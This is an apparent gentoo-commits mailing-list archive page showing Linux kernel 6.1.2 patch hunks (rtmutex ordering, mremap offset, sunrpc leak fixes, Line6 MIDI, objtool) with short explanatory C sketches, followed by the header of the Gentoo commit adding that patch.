++#ifdef __HAVE_ARCH_MEMCPY
++void *__tsan_memcpy(void *dst, const void *src, size_t len);
++noinline void *__tsan_memcpy(void *dst, const void *src, size_t len)
++{
++	size_t check_len = min_t(size_t, len, MAX_ENCODABLE_SIZE);
++
++	check_access(dst, check_len, KCSAN_ACCESS_WRITE, _RET_IP_);
++	check_access(src, check_len, 0, _RET_IP_);
++	return memcpy(dst, src, len);
++}
++#else
++void *__tsan_memcpy(void *dst, const void *src, size_t len) __alias(memcpy);
++#endif
++EXPORT_SYMBOL(__tsan_memcpy);
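
How the truncation in the new KCSAN wrappers behaves (sketch; the real MAX_ENCODABLE_SIZE is defined in kernel/kcsan/encoding.h and the 4096 below is only illustrative): the race check covers at most MAX_ENCODABLE_SIZE bytes, while the underlying memset/memcpy/memmove still operates on the full length:

    #include <stddef.h>
    #include <stdio.h>

    #define min_t(type, a, b) ((type)(a) < (type)(b) ? (type)(a) : (type)(b))
    #define MAX_ENCODABLE_SIZE 4096     /* illustrative value only */

    int main(void)
    {
        size_t count = 1 << 20;         /* a 1 MiB memset */
        size_t check_len = min_t(size_t, count, MAX_ENCODABLE_SIZE);

        /* Only check_len bytes get a watchpoint; all of count is written. */
        printf("checked %zu of %zu bytes\n", check_len, count);
        return 0;
    }
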
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index a35074f0daa1a..1c18ecf9f98b1 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -2213,13 +2213,9 @@ int register_kretprobe(struct kretprobe *rp)
+ 	rp->kp.post_handler = NULL;
+ 
+ 	/* Pre-allocate memory for max kretprobe instances */
+-	if (rp->maxactive <= 0) {
+-#ifdef CONFIG_PREEMPTION
++	if (rp->maxactive <= 0)
+ 		rp->maxactive = max_t(unsigned int, 10, 2*num_possible_cpus());
+-#else
+-		rp->maxactive = num_possible_cpus();
+-#endif
+-	}
++
+ #ifdef CONFIG_KRETPROBE_ON_RETHOOK
+ 	rp->rh = rethook_alloc((void *)rp, kretprobe_rethook_handler);
+ 	if (!rp->rh)
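
Effect of the kprobes hunk, read straight off the diff: the !CONFIG_PREEMPTION special case is gone, so every configuration now sizes the default maxactive as max(10, 2 * num_possible_cpus()). A trivial check of the formula:

    #include <stdio.h>

    #define max_t(type, a, b) ((type)(a) > (type)(b) ? (type)(a) : (type)(b))

    int main(void)
    {
        for (unsigned int cpus = 1; cpus <= 8; cpus *= 2)
            printf("%u cpus -> maxactive %u\n", cpus,
                   max_t(unsigned int, 10, 2 * cpus));
        return 0;
    }
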
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 7779ee8abc2a0..010cf4e6d0b8f 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -89,15 +89,31 @@ static inline int __ww_mutex_check_kill(struct rt_mutex *lock,
+  * set this bit before looking at the lock.
+  */
+ 
+-static __always_inline void
+-rt_mutex_set_owner(struct rt_mutex_base *lock, struct task_struct *owner)
++static __always_inline struct task_struct *
++rt_mutex_owner_encode(struct rt_mutex_base *lock, struct task_struct *owner)
+ {
+ 	unsigned long val = (unsigned long)owner;
+ 
+ 	if (rt_mutex_has_waiters(lock))
+ 		val |= RT_MUTEX_HAS_WAITERS;
+ 
+-	WRITE_ONCE(lock->owner, (struct task_struct *)val);
++	return (struct task_struct *)val;
++}
++
++static __always_inline void
++rt_mutex_set_owner(struct rt_mutex_base *lock, struct task_struct *owner)
++{
++	/*
++	 * lock->wait_lock is held but explicit acquire semantics are needed
++	 * for a new lock owner so WRITE_ONCE is insufficient.
++	 */
++	xchg_acquire(&lock->owner, rt_mutex_owner_encode(lock, owner));
++}
++
++static __always_inline void rt_mutex_clear_owner(struct rt_mutex_base *lock)
++{
++	/* lock->wait_lock is held so the unlock provides release semantics. */
++	WRITE_ONCE(lock->owner, rt_mutex_owner_encode(lock, NULL));
+ }
+ 
+ static __always_inline void clear_rt_mutex_waiters(struct rt_mutex_base *lock)
+@@ -106,7 +122,8 @@ static __always_inline void clear_rt_mutex_waiters(struct rt_mutex_base *lock)
+ 			((unsigned long)lock->owner & ~RT_MUTEX_HAS_WAITERS);
+ }
+ 
+-static __always_inline void fixup_rt_mutex_waiters(struct rt_mutex_base *lock)
++static __always_inline void
++fixup_rt_mutex_waiters(struct rt_mutex_base *lock, bool acquire_lock)
+ {
+ 	unsigned long owner, *p = (unsigned long *) &lock->owner;
+ 
+@@ -172,8 +189,21 @@ static __always_inline void fixup_rt_mutex_waiters(struct rt_mutex_base *lock)
+ 	 * still set.
+ 	 */
+ 	owner = READ_ONCE(*p);
+-	if (owner & RT_MUTEX_HAS_WAITERS)
+-		WRITE_ONCE(*p, owner & ~RT_MUTEX_HAS_WAITERS);
++	if (owner & RT_MUTEX_HAS_WAITERS) {
++		/*
++		 * See rt_mutex_set_owner() and rt_mutex_clear_owner() on
++		 * why xchg_acquire() is used for updating owner for
++		 * locking and WRITE_ONCE() for unlocking.
++		 *
++		 * WRITE_ONCE() would work for the acquire case too, but
++		 * in case that the lock acquisition failed it might
++		 * force other lockers into the slow path unnecessarily.
++		 */
++		if (acquire_lock)
++			xchg_acquire(p, owner & ~RT_MUTEX_HAS_WAITERS);
++		else
++			WRITE_ONCE(*p, owner & ~RT_MUTEX_HAS_WAITERS);
++	}
+ }
+ 
+ /*
+@@ -208,6 +238,13 @@ static __always_inline void mark_rt_mutex_waiters(struct rt_mutex_base *lock)
+ 		owner = *p;
+ 	} while (cmpxchg_relaxed(p, owner,
+ 				 owner | RT_MUTEX_HAS_WAITERS) != owner);
++
++	/*
++	 * The cmpxchg loop above is relaxed to avoid back-to-back ACQUIRE
++	 * operations in the event of contention. Ensure the successful
++	 * cmpxchg is visible.
++	 */
++	smp_mb__after_atomic();
+ }
+ 
+ /*
+@@ -1243,7 +1280,7 @@ static int __sched __rt_mutex_slowtrylock(struct rt_mutex_base *lock)
+ 	 * try_to_take_rt_mutex() sets the lock waiters bit
+ 	 * unconditionally. Clean this up.
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, true);
+ 
+ 	return ret;
+ }
+@@ -1604,7 +1641,7 @@ static int __sched __rt_mutex_slowlock(struct rt_mutex_base *lock,
+ 	 * try_to_take_rt_mutex() sets the waiter bit
+ 	 * unconditionally. We might have to fix that up.
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, true);
+ 
+ 	trace_contention_end(lock, ret);
+ 
+@@ -1719,7 +1756,7 @@ static void __sched rtlock_slowlock_locked(struct rt_mutex_base *lock)
+ 	 * try_to_take_rt_mutex() sets the waiter bit unconditionally.
+ 	 * We might have to fix that up:
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, true);
+ 	debug_rt_mutex_free_waiter(&waiter);
+ 
+ 	trace_contention_end(lock, 0);
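
The rtmutex changes are about memory ordering, and the closest userspace analogue is C11 atomics (an analogue only, not the kernel implementation): a relaxed store such as WRITE_ONCE() imposes no ordering, while an acquire exchange like xchg_acquire() orders the new owner's subsequent accesses after the ownership update:

    #include <stdatomic.h>
    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        _Atomic uintptr_t owner = 0;

        /* Acquire exchange: later loads/stores in this thread cannot be
         * reordered before the exchange's read of the old owner. */
        uintptr_t old = atomic_exchange_explicit(&owner, (uintptr_t)0x1000,
                                                 memory_order_acquire);
        printf("old=0x%jx new=0x%jx\n", (uintmax_t)old,
               (uintmax_t)atomic_load_explicit(&owner, memory_order_relaxed));
        return 0;
    }
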
+diff --git a/kernel/locking/rtmutex_api.c b/kernel/locking/rtmutex_api.c
+index 900220941caac..cb9fdff76a8a3 100644
+--- a/kernel/locking/rtmutex_api.c
++++ b/kernel/locking/rtmutex_api.c
+@@ -267,7 +267,7 @@ void __sched rt_mutex_init_proxy_locked(struct rt_mutex_base *lock,
+ void __sched rt_mutex_proxy_unlock(struct rt_mutex_base *lock)
+ {
+ 	debug_rt_mutex_proxy_unlock(lock);
+-	rt_mutex_set_owner(lock, NULL);
++	rt_mutex_clear_owner(lock);
+ }
+ 
+ /**
+@@ -382,7 +382,7 @@ int __sched rt_mutex_wait_proxy_lock(struct rt_mutex_base *lock,
+ 	 * try_to_take_rt_mutex() sets the waiter bit unconditionally. We might
+ 	 * have to fix that up.
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, true);
+ 	raw_spin_unlock_irq(&lock->wait_lock);
+ 
+ 	return ret;
+@@ -438,7 +438,7 @@ bool __sched rt_mutex_cleanup_proxy_lock(struct rt_mutex_base *lock,
+ 	 * try_to_take_rt_mutex() sets the waiter bit unconditionally. We might
+ 	 * have to fix that up.
+ 	 */
+-	fixup_rt_mutex_waiters(lock);
++	fixup_rt_mutex_waiters(lock, false);
+ 
+ 	raw_spin_unlock_irq(&lock->wait_lock);
+ 
+diff --git a/mm/compaction.c b/mm/compaction.c
+index 1f6da31dd9a50..ca1603524bbe0 100644
+--- a/mm/compaction.c
++++ b/mm/compaction.c
+@@ -1344,7 +1344,7 @@ move_freelist_tail(struct list_head *freelist, struct page *freepage)
+ }
+ 
+ static void
+-fast_isolate_around(struct compact_control *cc, unsigned long pfn, unsigned long nr_isolated)
++fast_isolate_around(struct compact_control *cc, unsigned long pfn)
+ {
+ 	unsigned long start_pfn, end_pfn;
+ 	struct page *page;
+@@ -1365,21 +1365,13 @@ fast_isolate_around(struct compact_control *cc, unsigned long pfn, unsigned long
+ 	if (!page)
+ 		return;
+ 
+-	/* Scan before */
+-	if (start_pfn != pfn) {
+-		isolate_freepages_block(cc, &start_pfn, pfn, &cc->freepages, 1, false);
+-		if (cc->nr_freepages >= cc->nr_migratepages)
+-			return;
+-	}
+-
+-	/* Scan after */
+-	start_pfn = pfn + nr_isolated;
+-	if (start_pfn < end_pfn)
+-		isolate_freepages_block(cc, &start_pfn, end_pfn, &cc->freepages, 1, false);
++	isolate_freepages_block(cc, &start_pfn, end_pfn, &cc->freepages, 1, false);
+ 
+ 	/* Skip this pageblock in the future as it's full or nearly full */
+ 	if (cc->nr_freepages < cc->nr_migratepages)
+ 		set_pageblock_skip(page);
++
++	return;
+ }
+ 
+ /* Search orders in round-robin fashion */
+@@ -1556,7 +1548,7 @@ fast_isolate_freepages(struct compact_control *cc)
+ 		return cc->free_pfn;
+ 
+ 	low_pfn = page_to_pfn(page);
+-	fast_isolate_around(cc, low_pfn, nr_isolated);
++	fast_isolate_around(cc, low_pfn);
+ 	return low_pfn;
+ }
+ 
+diff --git a/mm/kmsan/hooks.c b/mm/kmsan/hooks.c
+index 35f6b6e6a908c..3807502766a3e 100644
+--- a/mm/kmsan/hooks.c
++++ b/mm/kmsan/hooks.c
+@@ -260,6 +260,7 @@ void kmsan_handle_urb(const struct urb *urb, bool is_out)
+ 					       urb->transfer_buffer_length,
+ 					       /*checked*/ false);
+ }
++EXPORT_SYMBOL_GPL(kmsan_handle_urb);
+ 
+ static void kmsan_handle_dma_page(const void *addr, size_t size,
+ 				  enum dma_data_direction dir)
+diff --git a/mm/kmsan/kmsan_test.c b/mm/kmsan/kmsan_test.c
+index 9a29ea2dbfb9b..1328636cbd6cd 100644
+--- a/mm/kmsan/kmsan_test.c
++++ b/mm/kmsan/kmsan_test.c
+@@ -22,6 +22,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/string.h>
+ #include <linux/tracepoint.h>
++#include <linux/vmalloc.h>
+ #include <trace/events/printk.h>
+ 
+ static DEFINE_PER_CPU(int, per_cpu_var);
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index 61aa9aedb7289..02c8a712282f1 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -1540,6 +1540,7 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		 * the home node for vmas we already updated before.
+ 		 */
+ 		if (new->mode != MPOL_BIND && new->mode != MPOL_PREFERRED_MANY) {
++			mpol_put(new);
+ 			err = -EOPNOTSUPP;
+ 			break;
+ 		}
+diff --git a/mm/mremap.c b/mm/mremap.c
+index e465ffe279bb0..fe587c5d65913 100644
+--- a/mm/mremap.c
++++ b/mm/mremap.c
+@@ -1016,7 +1016,8 @@ SYSCALL_DEFINE5(mremap, unsigned long, addr, unsigned long, old_len,
+ 			long pages = (new_len - old_len) >> PAGE_SHIFT;
+ 			unsigned long extension_start = addr + old_len;
+ 			unsigned long extension_end = addr + new_len;
+-			pgoff_t extension_pgoff = vma->vm_pgoff + (old_len >> PAGE_SHIFT);
++			pgoff_t extension_pgoff = vma->vm_pgoff +
++				((extension_start - vma->vm_start) >> PAGE_SHIFT);
+ 
+ 			if (vma->vm_flags & VM_ACCOUNT) {
+ 				if (security_vm_enough_memory_mm(mm, pages)) {
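
Numeric illustration of the mremap() fix (all addresses hypothetical): when the remapped range does not start at the VMA's own start, deriving the extension's page offset from old_len alone computes the wrong extension_pgoff; offsetting from vma->vm_start is correct:

    #include <stdio.h>

    #define PAGE_SHIFT 12

    int main(void)
    {
        /* A VMA starting at 0x10000 with vm_pgoff 0; mremap() grows a
         * range that begins at addr = 0x30000, inside the VMA. */
        unsigned long vm_start = 0x10000, vm_pgoff = 0;
        unsigned long addr = 0x30000, old_len = 0x2000;
        unsigned long extension_start = addr + old_len;

        unsigned long buggy = vm_pgoff + (old_len >> PAGE_SHIFT);
        unsigned long fixed = vm_pgoff +
                ((extension_start - vm_start) >> PAGE_SHIFT);

        printf("buggy pgoff=%lu fixed pgoff=%lu\n", buggy, fixed);
        return 0;
    }
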
+diff --git a/net/sunrpc/auth_gss/svcauth_gss.c b/net/sunrpc/auth_gss/svcauth_gss.c
+index bcd74dddbe2db..9a5db285d4ae5 100644
+--- a/net/sunrpc/auth_gss/svcauth_gss.c
++++ b/net/sunrpc/auth_gss/svcauth_gss.c
+@@ -1162,18 +1162,23 @@ static int gss_read_proxy_verf(struct svc_rqst *rqstp,
+ 		return res;
+ 
+ 	inlen = svc_getnl(argv);
+-	if (inlen > (argv->iov_len + rqstp->rq_arg.page_len))
++	if (inlen > (argv->iov_len + rqstp->rq_arg.page_len)) {
++		kfree(in_handle->data);
+ 		return SVC_DENIED;
++	}
+ 
+ 	pages = DIV_ROUND_UP(inlen, PAGE_SIZE);
+ 	in_token->pages = kcalloc(pages, sizeof(struct page *), GFP_KERNEL);
+-	if (!in_token->pages)
++	if (!in_token->pages) {
++		kfree(in_handle->data);
+ 		return SVC_DENIED;
++	}
+ 	in_token->page_base = 0;
+ 	in_token->page_len = inlen;
+ 	for (i = 0; i < pages; i++) {
+ 		in_token->pages[i] = alloc_page(GFP_KERNEL);
+ 		if (!in_token->pages[i]) {
++			kfree(in_handle->data);
+ 			gss_free_in_token_pages(in_token);
+ 			return SVC_DENIED;
+ 		}
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 8015e44712678..386dd9d9143f9 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -167,6 +167,7 @@ struct hdmi_spec {
+ 	struct hdmi_ops ops;
+ 
+ 	bool dyn_pin_out;
++	bool static_pcm_mapping;
+ 	/* hdmi interrupt trigger control flag for Nvidia codec */
+ 	bool hdmi_intr_trig_ctrl;
+ 	bool nv_dp_workaround; /* workaround DP audio infoframe for Nvidia */
+@@ -1525,13 +1526,16 @@ static void update_eld(struct hda_codec *codec,
+ 	 */
+ 	pcm_jack = pin_idx_to_pcm_jack(codec, per_pin);
+ 
+-	if (eld->eld_valid) {
+-		hdmi_attach_hda_pcm(spec, per_pin);
+-		hdmi_pcm_setup_pin(spec, per_pin);
+-	} else {
+-		hdmi_pcm_reset_pin(spec, per_pin);
+-		hdmi_detach_hda_pcm(spec, per_pin);
++	if (!spec->static_pcm_mapping) {
++		if (eld->eld_valid) {
++			hdmi_attach_hda_pcm(spec, per_pin);
++			hdmi_pcm_setup_pin(spec, per_pin);
++		} else {
++			hdmi_pcm_reset_pin(spec, per_pin);
++			hdmi_detach_hda_pcm(spec, per_pin);
++		}
+ 	}
++
+ 	/* if pcm_idx == -1, it means this is in monitor connection event
+ 	 * we can get the correct pcm_idx now.
+ 	 */
+@@ -2281,8 +2285,8 @@ static int generic_hdmi_build_pcms(struct hda_codec *codec)
+ 	struct hdmi_spec *spec = codec->spec;
+ 	int idx, pcm_num;
+ 
+-	/* limit the PCM devices to the codec converters */
+-	pcm_num = spec->num_cvts;
++	/* limit the PCM devices to the codec converters or available PINs */
++	pcm_num = min(spec->num_cvts, spec->num_pins);
+ 	codec_dbg(codec, "hdmi: pcm_num set to %d\n", pcm_num);
+ 
+ 	for (idx = 0; idx < pcm_num; idx++) {
+@@ -2379,6 +2383,11 @@ static int generic_hdmi_build_controls(struct hda_codec *codec)
+ 		struct hdmi_spec_per_pin *per_pin = get_pin(spec, pin_idx);
+ 		struct hdmi_eld *pin_eld = &per_pin->sink_eld;
+ 
++		if (spec->static_pcm_mapping) {
++			hdmi_attach_hda_pcm(spec, per_pin);
++			hdmi_pcm_setup_pin(spec, per_pin);
++		}
++
+ 		pin_eld->eld_valid = false;
+ 		hdmi_present_sense(per_pin, 0);
+ 	}
+@@ -4419,6 +4428,8 @@ static int patch_atihdmi(struct hda_codec *codec)
+ 
+ 	spec = codec->spec;
+ 
++	spec->static_pcm_mapping = true;
++
+ 	spec->ops.pin_get_eld = atihdmi_pin_get_eld;
+ 	spec->ops.pin_setup_infoframe = atihdmi_pin_setup_infoframe;
+ 	spec->ops.pin_hbr_setup = atihdmi_pin_hbr_setup;
+diff --git a/sound/usb/line6/driver.c b/sound/usb/line6/driver.c
+index 59faa5a9a7141..b67617b68e509 100644
+--- a/sound/usb/line6/driver.c
++++ b/sound/usb/line6/driver.c
+@@ -304,7 +304,8 @@ static void line6_data_received(struct urb *urb)
+ 		for (;;) {
+ 			done =
+ 				line6_midibuf_read(mb, line6->buffer_message,
+-						LINE6_MIDI_MESSAGE_MAXLEN);
++						   LINE6_MIDI_MESSAGE_MAXLEN,
++						   LINE6_MIDIBUF_READ_RX);
+ 
+ 			if (done <= 0)
+ 				break;
+diff --git a/sound/usb/line6/midi.c b/sound/usb/line6/midi.c
+index ba0e2b7e8fe19..0838632c788e4 100644
+--- a/sound/usb/line6/midi.c
++++ b/sound/usb/line6/midi.c
+@@ -44,7 +44,8 @@ static void line6_midi_transmit(struct snd_rawmidi_substream *substream)
+ 	int req, done;
+ 
+ 	for (;;) {
+-		req = min(line6_midibuf_bytes_free(mb), line6->max_packet_size);
++		req = min3(line6_midibuf_bytes_free(mb), line6->max_packet_size,
++			   LINE6_FALLBACK_MAXPACKETSIZE);
+ 		done = snd_rawmidi_transmit_peek(substream, chunk, req);
+ 
+ 		if (done == 0)
+@@ -56,7 +57,8 @@ static void line6_midi_transmit(struct snd_rawmidi_substream *substream)
+ 
+ 	for (;;) {
+ 		done = line6_midibuf_read(mb, chunk,
+-					  LINE6_FALLBACK_MAXPACKETSIZE);
++					  LINE6_FALLBACK_MAXPACKETSIZE,
++					  LINE6_MIDIBUF_READ_TX);
+ 
+ 		if (done == 0)
+ 			break;
+diff --git a/sound/usb/line6/midibuf.c b/sound/usb/line6/midibuf.c
+index 6a70463f82c4e..e7f830f7526c9 100644
+--- a/sound/usb/line6/midibuf.c
++++ b/sound/usb/line6/midibuf.c
+@@ -9,6 +9,7 @@
+ 
+ #include "midibuf.h"
+ 
++
+ static int midibuf_message_length(unsigned char code)
+ {
+ 	int message_length;
+@@ -20,12 +21,7 @@ static int midibuf_message_length(unsigned char code)
+ 
+ 		message_length = length[(code >> 4) - 8];
+ 	} else {
+-		/*
+-		   Note that according to the MIDI specification 0xf2 is
+-		   the "Song Position Pointer", but this is used by Line 6
+-		   to send sysex messages to the host.
+-		 */
+-		static const int length[] = { -1, 2, -1, 2, -1, -1, 1, 1, 1, 1,
++		static const int length[] = { -1, 2, 2, 2, -1, -1, 1, 1, 1, -1,
+ 			1, 1, 1, -1, 1, 1
+ 		};
+ 		message_length = length[code & 0x0f];
+@@ -125,7 +121,7 @@ int line6_midibuf_write(struct midi_buffer *this, unsigned char *data,
+ }
+ 
+ int line6_midibuf_read(struct midi_buffer *this, unsigned char *data,
+-		       int length)
++		       int length, int read_type)
+ {
+ 	int bytes_used;
+ 	int length1, length2;
+@@ -148,9 +144,22 @@ int line6_midibuf_read(struct midi_buffer *this, unsigned char *data,
+ 
+ 	length1 = this->size - this->pos_read;
+ 
+-	/* check MIDI command length */
+ 	command = this->buf[this->pos_read];
++	/*
++	   PODxt always has status byte lower nibble set to 0010,
++	   when it means to send 0000, so we correct it here so
++	   that control/program changes come on channel 1 and
++	   sysex message status byte is correct
++	 */
++	if (read_type == LINE6_MIDIBUF_READ_RX) {
++		if (command == 0xb2 || command == 0xc2 || command == 0xf2) {
++			unsigned char fixed = command & 0xf0;
++			this->buf[this->pos_read] = fixed;
++			command = fixed;
++		}
++	}
+ 
++	/* check MIDI command length */
+ 	if (command & 0x80) {
+ 		midi_length = midibuf_message_length(command);
+ 		this->command_prev = command;
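
A standalone model of the RX status-byte fixup above (the three corrected bytes and the read-type gate come from the hunk; the helper is an illustration, not the driver's code): 0xb2, 0xc2 and 0xf2 are masked to their 0xX0 forms, so control and program changes land on channel 1 and sysex gets a proper 0xf0 status:

    #include <stdio.h>

    #define LINE6_MIDIBUF_READ_RX 1

    static unsigned char fixup_status(unsigned char command, int read_type)
    {
        if (read_type == LINE6_MIDIBUF_READ_RX &&
            (command == 0xb2 || command == 0xc2 || command == 0xf2))
            return command & 0xf0;
        return command;         /* TX data passes through untouched */
    }

    int main(void)
    {
        const unsigned char in[] = { 0xb2, 0xc2, 0xf2, 0x90 };

        for (unsigned int i = 0; i < sizeof(in); i++)
            printf("0x%02x -> 0x%02x\n", in[i],
                   fixup_status(in[i], LINE6_MIDIBUF_READ_RX));
        return 0;
    }
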
+diff --git a/sound/usb/line6/midibuf.h b/sound/usb/line6/midibuf.h
+index 124a8f9f7e96c..542e8d836f87d 100644
+--- a/sound/usb/line6/midibuf.h
++++ b/sound/usb/line6/midibuf.h
+@@ -8,6 +8,9 @@
+ #ifndef MIDIBUF_H
+ #define MIDIBUF_H
+ 
++#define LINE6_MIDIBUF_READ_TX 0
++#define LINE6_MIDIBUF_READ_RX 1
++
+ struct midi_buffer {
+ 	unsigned char *buf;
+ 	int size;
+@@ -23,7 +26,7 @@ extern void line6_midibuf_destroy(struct midi_buffer *mb);
+ extern int line6_midibuf_ignore(struct midi_buffer *mb, int length);
+ extern int line6_midibuf_init(struct midi_buffer *mb, int size, int split);
+ extern int line6_midibuf_read(struct midi_buffer *mb, unsigned char *data,
+-			      int length);
++			      int length, int read_type);
+ extern void line6_midibuf_reset(struct midi_buffer *mb);
+ extern int line6_midibuf_write(struct midi_buffer *mb, unsigned char *data,
+ 			       int length);
+diff --git a/sound/usb/line6/pod.c b/sound/usb/line6/pod.c
+index cd41aa7f03851..d173971e5f029 100644
+--- a/sound/usb/line6/pod.c
++++ b/sound/usb/line6/pod.c
+@@ -159,8 +159,9 @@ static struct line6_pcm_properties pod_pcm_properties = {
+ 	.bytes_per_channel = 3 /* SNDRV_PCM_FMTBIT_S24_3LE */
+ };
+ 
++
+ static const char pod_version_header[] = {
+-	0xf2, 0x7e, 0x7f, 0x06, 0x02
++	0xf0, 0x7e, 0x7f, 0x06, 0x02
+ };
+ 
+ static char *pod_alloc_sysex_buffer(struct usb_line6_pod *pod, int code,
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index a7f1e6c8bb0a7..51494c3002d91 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -207,7 +207,7 @@ static bool __dead_end_function(struct objtool_file *file, struct symbol *func,
+ 		return false;
+ 
+ 	insn = find_insn(file, func->sec, func->offset);
+-	if (!insn->func)
++	if (!insn || !insn->func)
+ 		return false;
+ 
+ 	func_for_each_insn(file, func, insn) {
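
Minimal illustration of the objtool fix (reduced stand-in types, not objtool's real structures): find_insn() can return NULL, so the pointer has to be tested before ->func is read:

    #include <stdio.h>

    struct symbol { const char *name; };
    struct instruction { struct symbol *func; };

    static struct instruction *find_insn(int present)
    {
        static struct symbol sym = { .name = "func" };
        static struct instruction insn;

        insn.func = &sym;
        return present ? &insn : NULL;
    }

    static int dead_end(struct instruction *insn)
    {
        if (!insn || !insn->func)       /* the added NULL check */
            return 0;
        return 1;
    }

    int main(void)
    {
        printf("%d %d\n", dead_end(find_insn(0)), dead_end(find_insn(1)));
        return 0;
    }
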


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-31 15:28 Mike Pagano
From: Mike Pagano @ 2022-12-31 15:28 UTC
  To: gentoo-commits

commit:     99cfecfe6b7115f295b20864a9a3292fca78347f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Dec 31 15:27:35 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Dec 31 15:27:35 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=99cfecfe

Linux patch 6.1.2
Fix for BMQ Patch Bug: https://bugs.gentoo.org/888043

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                       |     4 +
 1001_linux-6.1.2.patch                            | 45529 ++++++++++++++++++++
 5021_sched-alt-missing-rq-lock-irq-function.patch |    30 +
 3 files changed, 45563 insertions(+)

diff --git a/0000_README b/0000_README
index d85dd44f..7f1d2ce2 100644
--- a/0000_README
+++ b/0000_README
@@ -47,6 +47,10 @@ Patch:  1000_linux-6.1.1.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.1
 
+Patch:  1001_linux-6.1.2.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.2
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1001_linux-6.1.2.patch b/1001_linux-6.1.2.patch
new file mode 100644
index 00000000..dce6fb3b
--- /dev/null
+++ b/1001_linux-6.1.2.patch
@@ -0,0 +1,45529 @@
+diff --git a/Documentation/ABI/stable/sysfs-driver-dma-idxd b/Documentation/ABI/stable/sysfs-driver-dma-idxd
+index 8e2c2c405db22..3becc9a82bdf6 100644
+--- a/Documentation/ABI/stable/sysfs-driver-dma-idxd
++++ b/Documentation/ABI/stable/sysfs-driver-dma-idxd
+@@ -22,6 +22,7 @@ Date:           Oct 25, 2019
+ KernelVersion:  5.6.0
+ Contact:        dmaengine@vger.kernel.org
+ Description:    The largest number of work descriptors in a batch.
++                It's not visible when the device does not support batch.
+ 
+ What:           /sys/bus/dsa/devices/dsa<m>/max_work_queues_size
+ Date:           Oct 25, 2019
+@@ -49,6 +50,8 @@ Description:    The total number of read buffers supported by this device.
+ 		The read buffers represent resources within the DSA
+ 		implementation, and these resources are allocated by engines to
+ 		support operations. See DSA spec v1.2 9.2.4 Total Read Buffers.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:           /sys/bus/dsa/devices/dsa<m>/max_transfer_size
+ Date:           Oct 25, 2019
+@@ -122,6 +125,8 @@ Contact:        dmaengine@vger.kernel.org
+ Description:    The maximum number of read buffers that may be in use at
+ 		one time by operations that access low bandwidth memory in the
+ 		device. See DSA spec v1.2 9.2.8 GENCFG on Global Read Buffer Limit.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:		/sys/bus/dsa/devices/dsa<m>/cmd_status
+ Date:		Aug 28, 2020
+@@ -205,6 +210,7 @@ KernelVersion:	5.10.0
+ Contact:	dmaengine@vger.kernel.org
+ Description:	The max batch size for this workqueue. Cannot exceed device
+ 		max batch size. Configurable parameter.
++		It's not visible when the device does not support batch.
+ 
+ What:		/sys/bus/dsa/devices/wq<m>.<n>/ats_disable
+ Date:		Nov 13, 2020
+@@ -250,6 +256,8 @@ KernelVersion:	5.17.0
+ Contact:	dmaengine@vger.kernel.org
+ Description:	Enable the use of global read buffer limit for the group. See DSA
+ 		spec v1.2 9.2.18 GRPCFG Use Global Read Buffer Limit.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:		/sys/bus/dsa/devices/group<m>.<n>/read_buffers_allowed
+ Date:		Dec 10, 2021
+@@ -258,6 +266,8 @@ Contact:	dmaengine@vger.kernel.org
+ Description:	Indicates max number of read buffers that may be in use at one time
+ 		by all engines in the group. See DSA spec v1.2 9.2.18 GRPCFG Read
+ 		Buffers Allowed.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:		/sys/bus/dsa/devices/group<m>.<n>/read_buffers_reserved
+ Date:		Dec 10, 2021
+@@ -266,6 +276,8 @@ Contact:	dmaengine@vger.kernel.org
+ Description:	Indicates the number of Read Buffers reserved for the use of
+ 		engines in the group. See DSA spec v1.2 9.2.18 GRPCFG Read Buffers
+ 		Reserved.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:		/sys/bus/dsa/devices/group<m>.<n>/desc_progress_limit
+ Date:		Sept 14, 2022
+diff --git a/Documentation/ABI/testing/sysfs-bus-spi-devices-spi-nor b/Documentation/ABI/testing/sysfs-bus-spi-devices-spi-nor
+index d76cd3946434d..e9ef69aef20b1 100644
+--- a/Documentation/ABI/testing/sysfs-bus-spi-devices-spi-nor
++++ b/Documentation/ABI/testing/sysfs-bus-spi-devices-spi-nor
+@@ -5,6 +5,9 @@ Contact:	linux-mtd@lists.infradead.org
+ Description:	(RO) The JEDEC ID of the SPI NOR flash as reported by the
+ 		flash device.
+ 
++		The attribute is not present if the flash doesn't support
